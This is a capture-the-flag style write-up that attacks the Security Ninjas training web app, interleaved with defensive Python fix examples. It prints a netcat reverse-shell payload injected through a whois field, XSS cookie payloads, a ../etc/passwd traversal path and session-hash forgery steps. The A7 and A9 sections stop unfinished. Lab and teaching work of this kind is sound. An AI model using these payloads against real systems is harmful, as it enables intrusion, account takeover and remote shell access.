root💀bl4ck4non-sec:~#

Hack. Eat. Sleep. Repeat!!!


This is a vulnerable machine called Security Ninjas.

We can test it for common web vulnerabilities.

image

Well, let's dig in.

A1


image

We were told that this page has an OS Command Injection flaw

Let's provide a domain name, say google.com.

image image

So we got the whois look up results for the domain name google.com

The semicolon (;) is often used as a delimiter to separate multiple commands within a single input field. So, we can try to use the semicolon (;) character to run multiple commands.

For example, let's say we want to run the id command alongside the domain name we provided. Our input would then look like this: google.com;id

Let's execute this and see what happens.

image image

Scroll down,

image

It worked hehe, we were able to successfully execute the Linux command.

Other delimiter characters like | and || also work.
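To show why the delimiters above work and how the whois page should have built its command, here is an added example (not code from the Security Ninjas app): an allowlist check on the domain plus an argv list instead of a shell string, so the input is always one argument. printf stands in for whois so the demo runs offline.

```python
import re
import subprocess

# Strict allowlist for a hostname: dot-separated labels of letters, digits and hyphens.
DOMAIN_RE = re.compile(
    r"^(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$"
)

# The chaining characters the page uses (; | ||) plus a few other shell metacharacters.
SHELL_META = re.compile(r"[;|&`$<>\n]")


def is_valid_domain(value: str) -> bool:
    """Allowlist check: only accept something that looks like a hostname."""
    return bool(DOMAIN_RE.match(value))


def looks_like_injection(value: str) -> bool:
    """Denylist check, useful for logging and alerting, not as the only control."""
    return bool(SHELL_META.search(value))


def build_whois_argv(domain: str) -> list[str]:
    """Return the argv list for the lookup, or raise if the input is not a hostname."""
    if not is_valid_domain(domain):
        raise ValueError(f"rejected lookup input: {domain!r}")
    # A list (never shell=True) makes the domain a single argument; ';' is never parsed.
    return ["whois", domain]


def echo_as_argument(value: str) -> str:
    """Metacharacters are inert when passed as one argv element (printf stands in for whois)."""
    out = subprocess.run(["printf", "%s", value], capture_output=True, text=True, check=True)
    return out.stdout


if __name__ == "__main__":
    for candidate in ["google.com", "google.com;id", "google.com|id", "google.com||id"]:
        try:
            print(candidate, "->", build_whois_argv(candidate))
        except ValueError as err:
            print(candidate, "->", err, "| injection-looking:", looks_like_injection(candidate))
    print(repr(echo_as_argument("google.com;id")))  # printed literally, id never runs
```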

image

Let's get a reverse shell from this.

payload:rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc LHOST LPORT >/tmp/f

Ensure you set up a netcat listener

So, our input would look like this google.com|rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.0.168 1234 >/tmp/f

image

Checking my netcat listener

image

I was able to get a reverse shell.

Well, that’s all for this challenge since we’ve successfully exploited the vulnerability there.


A2


image image

So the exercise here is to get user2's personal information by exploiting the Broken Authentication and Session Management vulnerability.

Let's try to log in with the details they provided to us.

username:user1 password:145_Bluxome

image image

Cool, we are logged in

Let's try to view personal details, but this time we'll capture the request in Burp Suite and send it over to Burp Repeater.

image

We were able to view the personal information of user1. Well, something eye-catching here is the sessionID.

I ran hash-identifier on that hash and found

┌──(bl4ck4non㉿bl4ck4non)-[~]
└─$ hash-identifier     
   #########################################################################
   #     __  __                     __           ______    _____           #
   #    /\ \/\ \                   /\ \         /\__  _\  /\  _ `\         #
   #    \ \ \_\ \     __      ____ \ \ \___     \/_/\ \/  \ \ \/\ \        #
   #     \ \  _  \  /'__`\   / ,__\ \ \  _ `\      \ \ \   \ \ \ \ \       #
   #      \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \      \_\ \__ \ \ \_\ \      #
   #       \ \_\ \_\ \___ \_\/\____/  \ \_\ \_\     /\_____\ \ \____/      #
   #        \/_/\/_/\/__/\/_/\/___/    \/_/\/_/     \/_____/  \/___/  v1.2 #
   #                                                             By Zion3R #
   #                                                    www.Blackploit.com #
   #                                                   Root@Blackploit.com #
   #########################################################################
--------------------------------------------------
 HASH: b3daa77b4c04a9551b8781d03191fe098f325e67

Possible Hashs:
[+] SHA-1
[+] MySQL5 - SHA-1(SHA-1($pass))

Cool, the hash is SHA-1. Let's crack it to see what it says.

Save the hash in a file and use john

command:john hash --wordlist=/home/bl4ck4non/Documents/rockyou.txt --format=RAW-sha1

┌──(bl4ck4non㉿bl4ck4non)-[~]
└─$ john hash  --wordlist=/home/bl4ck4non/Documents/rockyou.txt --format=RAW-sha1
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-SHA1 [SHA1 256/256 AVX2 8x])
Warning: no OpenMP support for this hash type, consider --fork=4
Press 'q' or Ctrl-C to abort, almost any other key for status
user1            (?)     
1g 0:00:00:02 DONE (2023-09-29 16:37) 0.4878g/s 1446Kp/s 1446Kc/s 1446KC/s user1 01989..user074
Use the "--show --format=Raw-SHA1" options to display all of the cracked passwords reliably
Session completed. 

John cracked the hash: the plaintext is user1.

So, the sessionID is simply the SHA-1 hash of the username user1.

To read user2 personal information, what we can do is generate a sha1 hash for user2.

I used this website for that

image

Now, we'll be replacing the previous sessionID value with a1881c06eec96db9901c7bbfe41c42a3f08e9cb4

image

Cool cool, we are able to read the personal information for user2.
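The flaw here is that the sessionID is derived from the username, so anyone who can guess a username can forge a session. The following added example (not the Security Ninjas app's code) reproduces that weak scheme and sets it beside random, server-side session tokens that have nothing to crack or derive.

```python
import hashlib
import secrets
from typing import Optional


def weak_session_id(username: str) -> str:
    """The scheme A2 exposes: sessionID = SHA-1(username), forgeable for any known user."""
    return hashlib.sha1(username.encode()).hexdigest()


class SessionStore:
    """Opaque random tokens mapped to users on the server side."""

    def __init__(self) -> None:
        self._sessions: dict[str, str] = {}

    def create(self, username: str) -> str:
        token = secrets.token_urlsafe(32)  # 256 bits from the OS CSPRNG, unique per login
        self._sessions[token] = username
        return token

    def user_for(self, token: str) -> Optional[str]:
        """A forged or expired token resolves to no user at all."""
        return self._sessions.get(token)

    def destroy(self, token: str) -> None:
        self._sessions.pop(token, None)


if __name__ == "__main__":
    print("user1 ->", weak_session_id("user1"))  # the hash john cracked
    print("user2 ->", weak_session_id("user2"))  # the value pasted into Burp Repeater
    store = SessionStore()
    t = store.create("user1")
    print("random token:", t, "->", store.user_for(t))
    print("forged SHA-1 token resolves to:", store.user_for(weak_session_id("user2")))
```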

That will be all for this challenge since we have successfully exploited the vulnerability😎


A3


image

We have both Reflected XSS and Stored XSS here.

Let's start with Reflected XSS.

Reflected XSS

image

Well, my name is BlackAnon, let's try that.

image image

Let's try a simple JavaScript payload: <script>alert(1)</script>

image image

The payload got executed successfully. Let's try to steal some cookies: <script>alert(document.cookie)</script>

image image

Nice nice, we have successfully exploited this vulnerability.

Moving on to Stored XSS

Stored XSS

image

Let's try to provide some inputs.

image image

Now, stored XSS occurs when an application allows users to store data that includes malicious scripts on the server, and then serves that data to other users who view the affected page. This allows the attacker to execute their malicious code in the context of other users' browsers, potentially leading to various security risks.

This means our payload will be stored and executed when a user performs an action in the affected page.

Let's inject the Name parameter with a simple JavaScript payload: <script>alert(1)</script>

image image

Account creation was successful. Our payload will get executed when a user tries to view all the users in the database by clicking View Users

image

You can see it worked.

Let's try to steal cookies this time with the payload <script>alert(document.cookie)</script>

image image image

Our payload got executed successfully.

We have successfully exploited both Reflected XSS and Stored XSS.
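Both findings come down to the Name field being written into the page as raw markup. As an added example (not the Security Ninjas app's code), here is the "View Users" table rendered the vulnerable way and with output escaping; the user rows are constructed to mirror the stored payload above.

```python
import html

# Constructed sample of what the user table holds after the A3 registration.
USERS = [
    {"name": "BlackAnon", "email": "blackanon@example.com"},
    {"name": "<script>alert(document.cookie)</script>", "email": "x@example.com"},
]


def render_users_vulnerable(users) -> str:
    """Plain concatenation: the stored name becomes markup in every viewer's browser."""
    rows = "".join(f"<tr><td>{u['name']}</td><td>{u['email']}</td></tr>" for u in users)
    return f"<table>{rows}</table>"


def render_users_safe(users) -> str:
    """html.escape turns < > & and quotes into entities, so the browser shows text, not script."""
    rows = "".join(
        f"<tr><td>{html.escape(u['name'])}</td><td>{html.escape(u['email'])}</td></tr>"
        for u in users
    )
    return f"<table>{rows}</table>"


def contains_script_tag(markup: str) -> bool:
    """Simple check a test or a response scanner can apply to rendered output."""
    return "<script" in markup.lower()


if __name__ == "__main__":
    print(render_users_vulnerable(USERS))
    print(render_users_safe(USERS))
```

Escaping fixes the injection itself; marking the session cookie HttpOnly additionally keeps document.cookie from exposing it if another injection slips through.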


A4


image

So the task is to exploit the IDOR vulnerability and find a confidential document on the server.

Let's try to view the non-confidential document.

image

We get this. Well, the name of the pdf looks suspicious🤔

image

This looks like hex, so let's use CyberChef to decode it.

image

The hex decodes to the word non_confidential. So the document was named by hex-encoding the word non_confidential.

This means that to view the confidential document we have to hex-encode the word confidential.

Using CyberChef to encode:

image

Let's replace 6e6f6e5f636f6e666964656e7469616c.pdf with 636f6e666964656e7469616c.pdf

image

We were able to successfully view the confidential document. This means we have successfully completed this exercise😎
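Hex-encoding the name only hides the document ID, it does not authorize the request. This added example (not the Security Ninjas app's code) reproduces the encoding step and shows a document handler that checks the caller's role, so guessing the right ID is not enough; the registry and roles are constructed.

```python
def name_to_hex(word: str) -> str:
    """The naming scheme the page found: the document name as lowercase hex."""
    return word.encode().hex()


def hex_to_name(hex_name: str) -> str:
    return bytes.fromhex(hex_name).decode()


# Constructed registry: file name on disk plus the roles allowed to read it.
DOCUMENTS = {
    name_to_hex("non_confidential") + ".pdf": {
        "title": "non_confidential", "allowed_roles": {"user", "admin"},
    },
    name_to_hex("confidential") + ".pdf": {
        "title": "confidential", "allowed_roles": {"admin"},
    },
}


def fetch_document(role: str, requested: str):
    """Return (status, title); the ID being guessable changes nothing about the check."""
    doc = DOCUMENTS.get(requested)
    if doc is None:
        return 404, None
    if role not in doc["allowed_roles"]:
        return 403, None  # right ID, wrong caller: this is the check A4 is missing
    return 200, doc["title"]


if __name__ == "__main__":
    print(name_to_hex("non_confidential"), name_to_hex("confidential"))
    for role in ("user", "admin"):
        print(role, fetch_document(role, name_to_hex("confidential") + ".pdf"))
```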


A5


image

The task here is to exploit the file inclusion vulnerability.

What happens when we click on Meme1?

image

Take note of the url

How about when we click on Meme2?

image

Take a note of the url for this also.

Let's capture this request in Burp Suite and send it over to Burp Repeater.

image

Now, let's test for file inclusion vulnerabilities.

We'll start with Local File Inclusion.

Local File Inclusion

Local File Inclusion (LFI) is a type of security vulnerability that occurs when an attacker can manipulate input to a web application or system in such a way that it allows them to include and execute files on the local file system.

To test for this, we can use the payload ../../../../../../etc/passwd, so we'll replace meme2.html in the URL with this payload.

image

Cool stuff hehe, we were able to exploit Local File Inclusion on this server.

Moving on to Remote File Inclusion

Remote File Inclusion

Remote File Inclusion (RFI) is a security vulnerability that occurs in web applications when an attacker is able to include files from a remote server into the web application’s code.

So, we’ll host a file on our machine and try to execute it from the web application.

Let's host a .txt file:

┌──(bl4ck4non㉿bl4ck4non)-[~]
└─$ echo "vawulence is good for the health" > bankai.txt

┌──(bl4ck4non㉿bl4ck4non)-[~]
└─$ ls -l bankai.txt
-rw-r--r-- 1 bl4ck4non bl4ck4non 33 Sep 29 23:19 bankai.txt

┌──(bl4ck4non㉿bl4ck4non)-[~]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

Nice nice, now let's try to include this file from the web server.

image

Well, it didn’t work, our file didn’t get executed.

So, it is safe to say we can exploit Local File Inclusion on this web server but not Remote File Inclusion.

We've successfully completed this task.
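Both tests above come down to how the meme parameter is turned into a file path. As an added example (not the Security Ninjas app's code), here is a resolver that canonicalizes the path under the memes directory and refuses anything with a URL scheme, run against the three inputs used in this section; the memes directory is a temporary one created by the demo.

```python
import os
import tempfile
from urllib.parse import urlsplit


def resolve_include(base_dir: str, requested: str) -> str:
    """Return an absolute path inside base_dir, or raise ValueError."""
    if urlsplit(requested).scheme:  # http://.../bankai.txt style input: an RFI attempt
        raise ValueError("remote includes are not allowed")
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, requested))
    # realpath collapses ../ and symlinks; commonpath then proves we are still under base
    if os.path.commonpath([base, target]) != base:
        raise ValueError("path escapes the include directory")
    return target


def demo() -> dict[str, str]:
    """Build a throwaway memes directory and run the page's inputs through the resolver."""
    results = {}
    with tempfile.TemporaryDirectory() as d:
        base = os.path.realpath(d)
        with open(os.path.join(base, "meme2.html"), "w") as f:
            f.write("<img src=meme2.png>")
        for req in [
            "meme2.html",
            "../../../../../../etc/passwd",
            "http://192.168.0.168/bankai.txt",
        ]:
            try:
                results[req] = "ok:" + os.path.relpath(resolve_include(base, req), base)
            except ValueError as e:
                results[req] = "rejected:" + str(e)
    return results


if __name__ == "__main__":
    for req, outcome in demo().items():
        print(f"{req!r} -> {outcome}")
```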


A6


image

The task here is to find the hidden discount code by exploiting the sensitive data exposure vulnerability.

Checking the page source, I found this

image

That's a conditional statement that gives 10% off if the discount code matches oneteamonedream. The check, and the code itself, live in the page source that any visitor can read.

We've completed the task😎. It was quite easy actually.


A7


image

The task here is to find the function that lacks access control.

image

Click on that, then capture the request using Burp Suite and send it over to Burp Repeater.

image

We can see the is_admin value in the request is false. What happens when we change that value to true?

Well, let's find out.


A8


image image

We were provided login credentials; the task is to log in to the vulnerable page.

Let's log in as user1.

image image

We are asked to view the email, so let's do just that.

image

We are told that this page doesn't have CSRF protection, which means it is vulnerable to CSRF attacks. CSRF is a type of security vulnerability where an attacker tricks a victim into making an unwanted or unauthorized request to a web application on which the victim is authenticated.

Let's try to update user1's email address.

image image

We were able to successfully update user1's email address. Let's try updating the email for user2.

image image

So, we don't have the right privileges to perform this action.
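The missing protection is a token the attacker's page cannot know. This added example (not the Security Ninjas app's code) models the change-email endpoint with a per-session synchronizer token, plus the ownership check this section just observed; the user table is constructed.

```python
import hmac
import secrets

# Attribute set a safe session cookie should carry (SameSite limits cross-site sends).
SESSION_COOKIE_ATTRS = "HttpOnly; Secure; SameSite=Lax"


class EmailService:
    def __init__(self) -> None:
        self.emails = {"user1": "user1@example.com", "user2": "user2@example.com"}
        self._csrf_tokens: dict[str, str] = {}  # session user -> token issued with the form

    def render_form(self, session_user: str) -> dict:
        """GET: embed a fresh per-session token in the form; return it so callers can use it."""
        token = secrets.token_urlsafe(32)
        self._csrf_tokens[session_user] = token
        return {
            "form_html": f'<input type="hidden" name="csrf" value="{token}">',
            "csrf": token,
        }

    def update_email(self, session_user: str, form: dict) -> tuple[int, str]:
        """POST: refuse unless the submitted token matches the one issued to this session."""
        expected = self._csrf_tokens.get(session_user)
        submitted = form.get("csrf", "")
        if expected is None or not hmac.compare_digest(expected.encode(), submitted.encode()):
            return 403, "missing or invalid CSRF token"
        target = form.get("user", session_user)
        if target != session_user:
            return 403, "cannot change another user's email"  # the privilege check seen in A8
        self.emails[session_user] = form["email"]
        return 200, "email updated"


if __name__ == "__main__":
    svc = EmailService()
    print(svc.update_email("user1", {"email": "forged@example.com"}))  # no token: 403
    tok = svc.render_form("user1")["csrf"]
    print(svc.update_email("user1", {"csrf": tok, "email": "new@example.com"}))
```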


A9


image

The task here is to exploit the publicly known vulnerability in one of the components the page uses.

Checking the page source:

image

Well, I think there’s a vulnerability for that component